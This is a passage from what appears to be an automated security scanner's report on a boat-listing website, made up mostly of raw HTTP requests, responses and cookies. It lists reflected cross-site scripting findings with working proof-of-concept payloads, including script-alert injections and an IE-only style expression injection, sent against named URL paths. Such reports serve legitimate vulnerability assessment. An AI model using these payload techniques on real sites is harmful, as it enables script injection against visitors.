savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:33 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 10 Dec 2010 20:05:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:33 GMT
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
w" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2293873&boat_id=2293873&back=/core/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States4bd1b"><script>alert(1)</script>5fb880b10f1&boat_id=2293873">
...[SNIP]...

3.175. http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba4e"><script>alert(1)</script>3d7e038e9d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States?fba4e"><script>alert(1)</script>3d7e038e9d2=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:56 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 10 Dec 2010 20:05:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:55 GMT
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&fba4e"><script>alert(1)</script>3d7e038e9d2=1&currency=USD&units=Feet&seo=0&checked_boats=2293873&boat_id=2293873&back=/core/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States&boat_id=2293873">
...[SNIP]...

3.176. http://www.yachtworld.com/boats/Power/1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aa93"><a>fd3d7efb257 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /boats/Power5aa93"><a>fd3d7efb257/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:57:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Power5aa93"><a>fd3d7efb257/A-1">
...[SNIP]...

3.177. http://www.yachtworld.com/boats/Power/Bowrider/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/Power/Bowrider/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dec9"style%3d"x%3aexpression(alert(1))"86969decf0f was submitted in the REST URL parameter 4. This input was echoed as 8dec9"style="x:expression(alert(1))"86969decf0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/Power/Bowrider/18dec9"style%3d"x%3aexpression(alert(1))"86969decf0f HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F